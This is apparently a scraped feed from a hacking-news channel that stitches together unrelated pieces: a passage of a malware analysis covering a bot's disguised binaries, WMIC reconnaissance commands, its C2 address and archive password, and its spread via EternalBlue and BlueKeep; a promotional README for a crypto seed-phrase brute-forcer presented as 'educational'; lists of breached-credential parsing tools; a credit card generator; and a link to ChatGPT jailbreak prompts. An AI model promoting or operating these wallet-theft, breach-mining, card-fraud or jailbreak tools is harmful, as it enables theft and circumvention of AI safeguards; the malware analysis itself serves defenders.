the attackers attempted to execute C:\Windows\svchost.exe, which is the same file as sqhost.exe, and the attackers named it as svchost in earlier versions, but it wasn’t downloaded in the attack or in existence by this name. The reference for “svchost.exe” resides in different components of the malware, sometimes even in addition to “sqhost”. Our assumption is that it is used either for backwards-compatibility or it is the case that the attackers didn’t bother to change it in some places after renaming the main bot module to “sqhost.exe”.

Sqhost.exe: executed with “-watchdog” parameter, to make sure that it will keep running on the system.
Wmic.exe: was used to perform reconnaissance commands:
- wmic ComputerSystem get Model
- wmic OS get lastbootuptime
- wmic baseboard get product
- wmic os get caption


ExchDefender.exe
Exchdefender tries to masquerade as a “Microsoft Exchange Defender”, a non-existent program that masquerades as a legitimate Microsoft product.

When first executed, it creates a service named “Microsoft Exchange Defender” [MSExchangeDefenderPL] that is set to execute the binary (from C:\Windows) with the same command line as seen used with sqhost.exe - “Dcomsvc”:

Netwalker.7z

The Netwalker.7z archive downloaded from the C2 178.21.164[.]68 is password protected, using the password “horhor123”. The content of the archive is saved under C:\Windows\dell, together with the other components of the bot. The archive contains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a few DLLs,a copy of RdpcIip.exe and a few DLLs used by the bot components

RdpcIip.exe:

RdcIip.exe (with a capital “I” instead of a lowercase “L”) is both downloaded directly by sqhost.exe and is also contained in the Netwalker.7z archive". It is a key component of the malware. It has huge (trust us, huge) functionality with different branches with the main purpose being to interact with other components of the malware and make them work all together.

RdpcIip is responsible for some of the most important functions of the malware - harvesting credentials (using another component called Miwalk.exe) and spreading across the network using the stolen credentials as well as using the SMB exploit EternalBlue and the RDP exploit BlueKeep.

🦑Crypto-bruteforce:

Overview of Features:
1. Mnemonic Generation and Verification:
- Generates random BIP39 mnemonic phrases.
- Verifies mnemonics for Ethereum, BNB, and Dogecoin wallets.

2. Standalone Execution:
- Comes with precompiled binaries for direct use without needing Python installed.
- Binaries are available for download in its GitHub releases.

3. Automatic Setup:
- Automatically installs Python and dependencies (Cryptofuzz, Colorthon, Requests) if missing.
- Configures the environment for script execution.

4. Open Source:
- Fully open-source and accessible via GitHub.

---

### Installation & Usage:

#### 1. Standalone Binary:
- Download the binary file:
[DumperMnemonic.zip](https://github.com/welugroup/cryptocurency_catcher/releases/download/t/DumperMnemonic.zip)
- Extract and run the program without needing Python installed.

#### 2. Run with Git and Python:
- Clone the repository:

     git clone https://github.com/welugroup/cryptocurency_catcher
     cd cryptocurency_catcher
     python DumperMnemonic.py
     

#### 3. Install Python Libraries:
If you prefer manual installation:

   pip install cryptofuzz
   pip install colorthon
   pip install requests
   pip install requests-random-user-agent
   

Or install from the requirements file:

   pip install -r requirements.txt
   

#### 4. Running the Script:
- After dependencies are set:

     python DumperMnemonic.py
     

---

### Potential Uses:
1. Crypto Wallet Testing:
Generate and test mnemonic phrases for various blockchain networks.

2. Education and Learning:
Useful for understanding mnemonic creation, address derivation, and seed phrase management.

3. Exploration of Mnemonic Systems:
Analyze the security and randomness of generated mnemonics.

---

### GitHub Link:
Access the tool and documentation here:
[Dumper Mnemonic Repository](https://github.com/welugroup/cryptocurency_catcher)

Let me know if you'd like further assistance with setup or usage!

Brrr Be Gone: #Tesla Cars Prove Their Winter Mettle

https://undercodenews.com/brrr-be-gone-tesla-cars-prove-their-winter-mettle/

@Undercode_News

Breach Sites / Discovery Tools:

https://github.com/antonlindstrom/passpwn whatbreach h8mail hibp

https://github.com/hmaverickadams/breach-parse

https://github.com/KathanP19/BreachedDataScraper

https://github.com/ofarukcaki/dataleaks
https://github.com/xakepnz/BLUELAY https://github.com/jayyogesh/BaseQuery
https://github.com/artofscripting/PySearchBreachCompilation
https://github.com/chparmley/FB-Breach-Checker
https://github.com/FreiBj/data-breach-formatter
https://github.com/p4wnsolo/EmailPwnCheckerbot ( this is also a great Selenium example )
https://github.com/GihuMendes/breach-parse/blob/main/parser.sh ( parse COMB with simple Python )
https://github.com/SagarSRJ/Breach-Parser ( parse .csv )
https://github.com/davieking1/breachpearser ( parse COMB )
https://github.com/TheFern2/breach-parse.py/tree/main/breach_parse ( parse COMB - looks recent )
https://github.com/FreeZeroDays/breach-rip ( faster COMB parser )
https://github.com/alivirgo/read-a-password-file-huge-lists
https://github.com/martintjj/BreachCompilation ( tools in Breach Compilation - 4 yrs old )
https://github.com/jesusgoku/targz-search ( search .txt files within .tar.gz files )

Here's a rewritten and more attractive #version of the article:

https://undercodenews.com/heres-a-rewritten-and-more-attractive-version-of-the-article/

@Undercode_News

🌐 Informative XING: Your Professional Network

https://undercodenews.com/informative-xing-your-professional-network/

@Undercode_News

#Tesla and Strausberg-Erkner Water Association Negotiate Water Deal for Giga Berlin

https://undercodenews.com/tesla-and-strausberg-erkner-water-association-negotiate-water-deal-for-giga-berlin/

@Undercode_News

🚨 #AI-Powered Phishing: A New Threat to Web3

https://undercodenews.com/ai-powered-phishing-a-new-threat-to-web3/

@Undercode_News

🚨 Hacking Uyghurs and Tibetans: The Earth Minotaur Threat

https://undercodenews.com/hacking-uyghurs-and-tibetans-the-earth-minotaur-threat/

@Undercode_News

Informative Fortifying Your #Digital Kingdom: A Guide to Securing Privileged Accounts

https://undercodenews.com/informative-fortifying-your-digital-kingdom-a-guide-to-securing-privileged-accounts/

@Undercode_News

🦑ChatGPT Jailbreaking prompts, exploits and other fun stuff:

https://gist.github.com/jahtzee/5d02b310b1d39b047664bec20a9be17c

🔧 Russian Intelligence Uses #Spyware to Monitor Programmer Supporting Ukraine

https://undercodenews.com/russian-intelligence-uses-spyware-to-monitor-programmer-supporting-ukraine/

@Undercode_News

#TikTok's Fate Hangs in the Balance: A Legal Battle Looms

https://undercodenews.com/tiktoks-fate-hangs-in-the-balance-a-legal-battle-looms/

@Undercode_News

🦑CC Generator:

https://github.com/KOUISAmine/credit-card-generator

🚨 #Python #AI Library Compromised in Supply Chain Attack

https://undercodenews.com/python-ai-library-compromised-in-supply-chain-attack/

@Undercode_News